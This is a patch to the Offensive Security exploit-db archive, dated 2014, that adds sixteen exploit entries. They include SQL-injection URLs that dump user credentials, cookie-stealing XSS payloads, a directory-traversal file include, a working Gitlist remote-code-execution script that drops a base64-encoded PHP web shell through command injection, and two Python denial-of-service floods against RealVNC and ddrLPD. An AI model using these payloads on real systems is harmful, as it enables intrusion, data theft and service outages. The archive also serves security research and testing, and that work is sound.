From 48fef00530a1a0d915e031f8887fa5b018c543a9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 1 Jul 2014 04:39:53 +0000 Subject: [PATCH] Updated 07_01_2014 --- files.csv | 16 +++++++ platforms/asp/webapps/33923.txt | 7 +++ platforms/cfm/webapps/33916.txt | 9 ++++ platforms/multiple/remote/33929.py | 45 ++++++++++++++++++ platforms/php/remote/33920.php | 16 +++++++ platforms/php/webapps/33913.html | 11 +++++ platforms/php/webapps/33914.txt | 12 +++++ platforms/php/webapps/33915.txt | 9 ++++ platforms/php/webapps/33917.txt | 11 +++++ platforms/php/webapps/33918.txt | 9 ++++ platforms/php/webapps/33919.txt | 15 ++++++ platforms/php/webapps/33921.txt | 9 ++++ platforms/php/webapps/33922.txt | 10 ++++ platforms/php/webapps/33925.txt | 9 ++++ platforms/php/webapps/33927.txt | 7 +++ platforms/windows/dos/33924.py | 74 ++++++++++++++++++++++++++++++ platforms/windows/dos/33926.py | 66 ++++++++++++++++++++++++++ 17 files changed, 335 insertions(+) create mode 100755 platforms/asp/webapps/33923.txt create mode 100755 platforms/cfm/webapps/33916.txt create mode 100755 platforms/multiple/remote/33929.py create mode 100755 platforms/php/remote/33920.php create mode 100755 platforms/php/webapps/33913.html create mode 100755 platforms/php/webapps/33914.txt create mode 100755 platforms/php/webapps/33915.txt create mode 100755 platforms/php/webapps/33917.txt create mode 100755 platforms/php/webapps/33918.txt create mode 100755 platforms/php/webapps/33919.txt create mode 100755 platforms/php/webapps/33921.txt create mode 100755 platforms/php/webapps/33922.txt create mode 100755 platforms/php/webapps/33925.txt create mode 100755 platforms/php/webapps/33927.txt create mode 100755 platforms/windows/dos/33924.py create mode 100755 platforms/windows/dos/33926.py diff --git a/files.csv b/files.csv index 8bc0bb28b..189cbef44 100755 --- a/files.csv +++ b/files.csv @@ -30543,3 +30543,19 @@ id,file,description,date,author,platform,type,port 33907,platforms/multiple/remote/33907.txt,"ZKSoftware 'ZK5000' Remote Information Disclosure Vulnerability",2010-03-20,fb1h2s,multiple,remote,0 33908,platforms/php/webapps/33908.txt,"Your Articles Directory Login Option SQL Injection Vulnerability",2010-04-29,Sid3^effects,php,webapps,0 33909,platforms/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 'username' Parameter SQL Injection Vulnerability",2010-04-28,"John Leitch",php,webapps,0 +33913,platforms/php/webapps/33913.html,"osCommerce 3.0a5 Local File Include and HTML Injection Vulnerabilities",2010-04-30,"Jordi Chancel",php,webapps,0 +33914,platforms/php/webapps/33914.txt,"4xcms 'login.php' Multiple SQL Injection Vulnerabilities",2010-03-21,"cr4wl3r ",php,webapps,0 +33915,platforms/php/webapps/33915.txt,"Campsite 3.x 'article_id' Parameter SQL Injection Vulnerability",2010-04-30,"Stefan Esser",php,webapps,0 +33916,platforms/cfm/webapps/33916.txt,"Mango Blog 1.4.1 'archives.cfm/search' Cross Site Scripting Vulnerability",2010-05-03,MustLive,cfm,webapps,0 +33917,platforms/php/webapps/33917.txt,"Billwerx RC5.2.2 PL2 'primary_number' Parameter SQL Injection Vulnerability",2010-05-02,indoushka,php,webapps,0 +33918,platforms/php/webapps/33918.txt,"CF Image Hosting Script 1.1 'upload.php' Arbitrary File Upload Vulnerability",2010-05-01,The.Morpheus,php,webapps,0 +33919,platforms/php/webapps/33919.txt,"NolaPro Enterprise 4.0.5538 Cross Site Scripting and SQL Injection Vulnerabilities",2010-05-01,ekse,php,webapps,0 +33920,platforms/php/remote/33920.php,"PHP 5.3 'php_dechunk()' HTTP Chunked Encoding Integer Overflow Vulnerability",2010-05-02,"Stefan Esser",php,remote,0 +33921,platforms/php/webapps/33921.txt,"IslamSound Multiple Remote SQL Injection Vulnerabilities",2010-05-03,JIKO,php,webapps,0 +33922,platforms/php/webapps/33922.txt,"CH-CMS.ch 2 Multiple Arbitrary File Upload Vulnerabilities",2010-03-15,EL-KAHINA,php,webapps,0 +33923,platforms/asp/webapps/33923.txt,"SamaGraph CMS 'inside.aspx' SQL Injection Vulnerability",2010-03-11,K053,asp,webapps,0 +33924,platforms/windows/dos/33924.py,"RealVNC 4.1.3 'ClientCutText' Message Remote Denial of Service Vulnerability",2010-05-02,"John Leitch",windows,dos,0 +33925,platforms/php/webapps/33925.txt,"ecoCMS 18.4.2010 'admin.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0 +33926,platforms/windows/dos/33926.py,"ddrLPD 1.0 Remote Denial of Service Vulnerability",2010-04-29,"Bisphemol A",windows,dos,0 +33927,platforms/php/webapps/33927.txt,"eZoneScripts Apartment Search Script 'listtest.php' SQL Injection Vulnerability",2010-02-09,JIKO,php,webapps,0 +33929,platforms/multiple/remote/33929.py,"Gitlist <= 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0 diff --git a/platforms/asp/webapps/33923.txt b/platforms/asp/webapps/33923.txt new file mode 100755 index 000000000..40fdd6a2f --- /dev/null +++ b/platforms/asp/webapps/33923.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/39892/info + +SamaGraph CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/inside.aspx?g=' or '1'='1'-- \ No newline at end of file diff --git a/platforms/cfm/webapps/33916.txt b/platforms/cfm/webapps/33916.txt new file mode 100755 index 000000000..e1b9c76f9 --- /dev/null +++ b/platforms/cfm/webapps/33916.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39864/info + +Mango Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Versions prior to Mango Blog 1.4.2 are vulnerable. + +http://www.example.com/archives.cfm/search/?term=%3Cbody%20onload=alert(document.cookie)%3E \ No newline at end of file diff --git a/platforms/multiple/remote/33929.py b/platforms/multiple/remote/33929.py new file mode 100755 index 000000000..e9f247f3b --- /dev/null +++ b/platforms/multiple/remote/33929.py @@ -0,0 +1,45 @@ +from commands import getoutput +import urllib +import sys + +""" +Exploit Title: Gitlist <= 0.4.0 anonymous RCE +Date: 06/20/2014 +Author: drone (@dronesec) +Vendor Homepage: http://gitlist.org/ +Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz +Version: <= 0.4.0 +Fixed in: 0.5.0 +Tested on: Debian 7 +More information: http://hatriot.github.io/blog/2014/06/29/gitlist-rce/ +cve: CVE-2014-4511 +""" + +if len(sys.argv) <= 1: + print '%s: [url to git repo] {cache path}' % sys.argv[0] + print ' Example: python %s http://localhost/gitlist/my_repo.git' % sys.argv[0] + print ' Example: python %s http://localhost/gitlist/my_repo.git /var/www/git/cache' % sys.argv[0] + sys.exit(1) + +url = sys.argv[1] +url = url if url[-1] != '/' else url[:-1] + +path = "/var/www/gitlist/cache" +if len(sys.argv) > 2: + path = sys.argv[2] + +print '[!] Using cache location %s' % path + +# payload +payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo=" + +# sploit; python requests does not like this URL, hence wget is used +mpath = '/blame/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path) +mpath = url+ urllib.quote(mpath) + +out = getoutput("wget %s" % mpath) +if '500' in out: + print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0] +else: + print '[-] Failed to drop' + print out diff --git a/platforms/php/remote/33920.php b/platforms/php/remote/33920.php new file mode 100755 index 000000000..bf0552716 --- /dev/null +++ b/platforms/php/remote/33920.php @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/39877/info + +PHP is prone to a remote integer-overflow vulnerability. + +An attacker can exploit this issue to execute arbitrary code in the context of the PHP process. Failed exploit attempts will result in a denial-of-service condition. + +PHP 5.3.0 through 5.3.2 are vulnerable; other versions may also be affected. + + diff --git a/platforms/php/webapps/33913.html b/platforms/php/webapps/33913.html new file mode 100755 index 000000000..9c010ccb1 --- /dev/null +++ b/platforms/php/webapps/33913.html @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/39820/info + +osCommerce is prone to a local file-include vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit the local file-include vulnerability using directory-traversal strings to execute local files within the context of the webserver process. + +The attacker may leverage the HTML-injection issue to execute arbitrary HTML and script code in the context of the affected browser. This may let the attacker steal cookie-based authentication credentials or control how the site is rendered to the user. + +osCommerce 3.0a5 is affected; other versions may also be vulnerable. + +http://www.example.com/admin/includes/applications/services/pages/uninstall.php?module=../../../../../../../../cmd \ No newline at end of file diff --git a/platforms/php/webapps/33914.txt b/platforms/php/webapps/33914.txt new file mode 100755 index 000000000..f6e5cdd6c --- /dev/null +++ b/platforms/php/webapps/33914.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/39840/info + +4xcms is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +4xcms r26 is vulnerable; other versions may also be affected. + +The following example data is available: + +User: ' or '1=1 +Pass: ' or '1=1 \ No newline at end of file diff --git a/platforms/php/webapps/33915.txt b/platforms/php/webapps/33915.txt new file mode 100755 index 000000000..789e787d7 --- /dev/null +++ b/platforms/php/webapps/33915.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39862/info + +Campsite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Campsite versions 3.2 through 3.3.5 are vulnerable; other versions may also be affected. + +http://www.example.com/javascript/tinymce/plugins/campsiteattachment/attachments.php?article_id=0+UNION+SELECT+Id,2,concat%28UName,0x2e,Password%29,4,5,6,7,8,9,10,11,12+FROM+liveuser_users+--+x \ No newline at end of file diff --git a/platforms/php/webapps/33917.txt b/platforms/php/webapps/33917.txt new file mode 100755 index 000000000..e559a9d14 --- /dev/null +++ b/platforms/php/webapps/33917.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/39867/info + +Billwerx is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Billwerx RC5.2.2 PL2 is vulnerable; other versions may also be affected. + +The following example URI is available: + +http://www.example.com/billwerx_rc522_pl2/request_account.php?campaign_id=1&group_id=6&interest_id=6&first_name=indoushka&last_name=indoushka&company_name=indoushka&home_number=indoushka&get_primary=indoushka&work_number=indoushka&mobile_number=indoushka&email_address=indoushka&comments=indoushka&request=REQUEST&close=CLOSE&primary_number=' [(SQL)] \ No newline at end of file diff --git a/platforms/php/webapps/33918.txt b/platforms/php/webapps/33918.txt new file mode 100755 index 000000000..12264a751 --- /dev/null +++ b/platforms/php/webapps/33918.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39870/info + +CF Image Hosting Script is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +CF Image Hosting Script 1.1 is vulnerable; other versions may also be affected. + +http://www.example.com/upload.php \ No newline at end of file diff --git a/platforms/php/webapps/33919.txt b/platforms/php/webapps/33919.txt new file mode 100755 index 000000000..8bfcd65e0 --- /dev/null +++ b/platforms/php/webapps/33919.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/39875/info + +NolaPro Enterprise is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +NolaPro Enterprise 4.0.5538 is vulnerable; other versions may also be affected. + +http/www.example.com/sidemenu.php?index=1&menutitle=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110,100,32,98,121,32,67,111,114,101,108,97,11 +0,32,84,101,97,109%29%29;%3C/script%3E&menutitleorig=STR_ORDERS + +http://www.example.om/nporderitemremote.php?pos_mode=1¤cy=USD&curdate=2010-04-12&linenum=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110 +,100,32,98,121,32,67,111,114,101,108,97,110,32,84,101,97,109%29%29;%3C/script%3E&inventorylocationid=1&customerid=&shiptoid=0 + +1 or BENCHMARK(2500000,MD5(1)) diff --git a/platforms/php/webapps/33921.txt b/platforms/php/webapps/33921.txt new file mode 100755 index 000000000..99b0e8c2b --- /dev/null +++ b/platforms/php/webapps/33921.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39880/info + +IslamSound is prone to multiple remote SQL injection vulnerabilities. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/sound.php?catid=2 sql +http://www.example.com/details.php?linkid=-7 union select user(),1,2,database(),version(),5,6,7,8-- +http://www.example.com/send.php?linkid=-5 union select user(),1,2,3,4,5,6,7,8-- \ No newline at end of file diff --git a/platforms/php/webapps/33922.txt b/platforms/php/webapps/33922.txt new file mode 100755 index 000000000..37d0c5cc9 --- /dev/null +++ b/platforms/php/webapps/33922.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/39888/info + +CH-CMS.ch is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +CH-CMS.ch 2 is vulnerable; other versions may also be affected. + +http://www.example.com/Final/login/ava_up1.php +http://www.example.com/Final/login/ava_up12.php \ No newline at end of file diff --git a/platforms/php/webapps/33925.txt b/platforms/php/webapps/33925.txt new file mode 100755 index 000000000..3208e50b3 --- /dev/null +++ b/platforms/php/webapps/33925.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39901/info + +ecoCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +ecoCMS 18.04.2010 is vulnerable; prior versions may also be affected. + +http://www.example.com/admin.php?p=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E diff --git a/platforms/php/webapps/33927.txt b/platforms/php/webapps/33927.txt new file mode 100755 index 000000000..6c5cc2cc5 --- /dev/null +++ b/platforms/php/webapps/33927.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/39905/info + +eZoneScripts Apartment Search Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/productdemos/ApartmentSearch/listtest.php?r=-1 union select 0,user()-- \ No newline at end of file diff --git a/platforms/windows/dos/33924.py b/platforms/windows/dos/33924.py new file mode 100755 index 000000000..a6ae9b3bd --- /dev/null +++ b/platforms/windows/dos/33924.py @@ -0,0 +1,74 @@ +source: http://www.securityfocus.com/bid/39895/info + +RealVNC Viewer is prone to a remote denial-of-service vulnerability. + +An attacker can exploit this issue to crash the affected application, denying service to legitimate users. + +RealVNC 4.1.3 is vulnerable; other versions may also be affected. + +import sys, struct, socket +host ='localhost' +port = 5900 + +def crash_vnc_server(): + try: + while 1: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(1.0) + + print 'Connected' + + try: + b = s.recv(8192) + print 'ProtocolVersion Received' + + s.send(b) + print 'ProtocolVersion Sent' + + b = s.recv(8192) + print 'Security Received' + + s.send('\x01') + print 'Security Sent' + + # Recv SecurityResult + b = s.recv(8192) + print 'SecurityResult Received' + + if (len(b) == 4 and + b[0] == chr(0) and + b[1] == chr(0) and + b[2] == chr(0) and + b[3] == chr(0)): + print 'SecurityResult OK' + else: + print 'SecurityResult Failed.\n\nThe server must be set '\ + 'to No Authentication for this to work, otherwise '\ + 'you \'ll need to write the necessary client side '\ + 'authentication code yourself.' + return + + s.send('\x01') + print 'ClientInit Sent' + + b = s.recv(8192) + print 'ServerInit Received' + + text_len = 0xFFFFFF + text_str = struct.pack('L', text_len) + '\xAA' * text_len + + while 1: + s.send('\x06\x00\x00\x00' + text_str) + + print 'ClientCutText Sent' + + except Exception: + print 'Connection closed' + + except Exception: + print 'Couldn\'t connect' + +crash_vnc_server() + + diff --git a/platforms/windows/dos/33926.py b/platforms/windows/dos/33926.py new file mode 100755 index 000000000..ef4c8368c --- /dev/null +++ b/platforms/windows/dos/33926.py @@ -0,0 +1,66 @@ +source: http://www.securityfocus.com/bid/39904/info + +ddrLPD is prone to a remote denial-of-service vulnerability. + +An attacker can exploit this issue to crash the affected application, denying service to legitimate users. + +ddrLPD 1.0 is vulnerable; other versions may also be affected. + +#==================================================================================================# +# # +# $$$$$$$\ $$\ $$\ $$\ $$$$$$\ # +# $$ __$$\ \__| $$ | $$ | $$ __$$\ # +# $$ | $$ |$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$ | $$ / $$ | # +# $$$$$$$\ |$$ |$$ _____|$$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ | $$$$$$$$ | # +# $$ __$$\ $$ |\$$$$$$\ $$ / $$ |$$ | $$ |$$$$$$$$ |$$ | $$ |$$ / $$ |$$ | $$ __$$ | # +# $$ | $$ |$$ | \____$$\ $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ |$$ | $$ | $$ | # +# $$$$$$$ |$$ |$$$$$$$ |$$$$$$$ |$$ | $$ |\$$$$$$$\ $$ | $$ |\$$$$$$ |$$ | $$ | $$ | # +# \_______/ \__|\_______/ $$ ____/ \__| \__| \_______|\__| \__| \______/ \__| \__| \__| # +# $$ | # +# $$ | Plastics Make It Possible # +# \__| # +# # +#==================================================================================================# +# # +# Vulnerability............Denial-of-Service # +# Software.................ddrLPD 1.0 # +# Download.................http://ddr.web.id/files/ddrLPDsetup.exe # +# Date.....................4/29/10 # +# # +#==================================================================================================# +# # +# Site.....................http://cross-site-scripting.blogspot.com/ # +# Email....................john.leitch5@gmail.com # +# # +#==================================================================================================# +# # +# ##Description## # +# # +# Sending packets composed of bytes between 1 and 5 (inclusive) causes the the server to crash. # +# # +# ddrlpd.exe: The instruction at 0x50431A referenced memory at 0x0. The memory could not be read # +# (0x0050431A -> 00000000) # +# # +# ##Proof of Concept## # +import socket +host ='localhost' + +try: + while 1: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, 515)) + s.settimeout(1.0) + + print 'connected', + + try: + while 1: + s.send('\x01'*8192) + print '.', + except Exception: + print '\nconnection closed' + pass + +except Exception: + print 'couldn\'t connect' +